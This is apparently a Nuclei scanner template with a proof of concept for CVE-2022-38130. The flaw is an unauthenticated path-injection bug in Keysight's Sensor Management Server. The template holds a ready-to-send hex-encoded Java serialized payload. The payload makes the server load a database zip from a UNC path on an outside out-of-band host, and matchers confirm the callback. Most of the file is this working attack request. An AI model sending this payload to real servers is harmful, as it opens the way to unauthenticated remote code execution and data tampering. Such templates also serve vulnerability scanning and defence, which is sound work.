The com.keysight.tentacle.config.ResourceManager.smsRestoreDatabaseZip() method is used to restore the HSQLDB database used in SMS. It takes the path of the zipped database file as the single parameter. An unauthenticated, remote attacker can specify an UNC path for the database file (i.e., \\<attacker-host>\sms\<attacker-db.zip>), effectively controlling the content of the database to be restored.
PoC代码[已公开]
id: CVE-2022-38130
info:
name: KeySight RF - smsRestoreDatabaseZip UNC path to Remote Code Execution
author: daffainfo,jjcho
severity: critical
description: |
The com.keysight.tentacle.config.ResourceManager.smsRestoreDatabaseZip() method is used to restore the HSQLDB database used in SMS. It takes the path of the zipped database file as the single parameter. An unauthenticated, remote attacker can specify an UNC path for the database file (i.e., \\<attacker-host>\sms\<attacker-db.zip>), effectively controlling the content of the database to be restored.
impact: |
Unauthenticated attackers can control database content, potentially leading to data tampering or execution of malicious code.
remediation: |
Implement validation and sanitization of the database file path parameter to restrict to trusted locations.
reference:
- https://www.tenable.com/security/research/tra-2022-28
- https://www.sonicwall.com/blog/keysight-rf-sensor-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-38130
epss-score: 0.79442
epss-percentile: 0.99039
cwe-id: CWE-89
cpe: cpe:2.3:a:keysight:sensor_management_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: keysight
product: sensor_management_server
tags: cve,cve2025,keysight,sensor_management_server,rce,vkev,oast,oob
variables:
cmd: '\\\\{{interactsh-url}}\\test'
serialized_str: '{{concat(hex_decode("aced0005737200356f72672e737072696e676672616d65776f726b2e72656d6f74696e672e737570706f72742e52656d6f7465496e766f636174696f6e5f6c8b9ff60a110a0200045b0009617267756d656e74737400135b4c6a6176612f6c616e672f4f626a6563743b4c000a6174747269627574657374000f4c6a6176612f7574696c2f4d61703b4c000a6d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000e706172616d6574657254797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017400"), hex_decode(dec_to_hex(len(cmd))), cmd, hex_decode("70740015736d73526573746f726544617461626173655a6970757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb3420200007870"))}}'
http:
- raw:
- |
POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-java-serialized-object
{{serialized_str}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(interactsh_protocol, 'dns')"
- "contains(content_type, 'application/x-java-serialized-object')"
- "contains_all(body, 'org.springframework','RemoteInvocationResult')"
condition: and
# digest: 4a0a004730450220134a9ec4e96884454efede6005925df8675d71e9f7a91157501cbec45f9f8bd4022100b4cc9f71a3ef4862962380a95f2b87f52750021a31abb16fa50e59970971db59:922c64590222798bb761d5b6d8e72950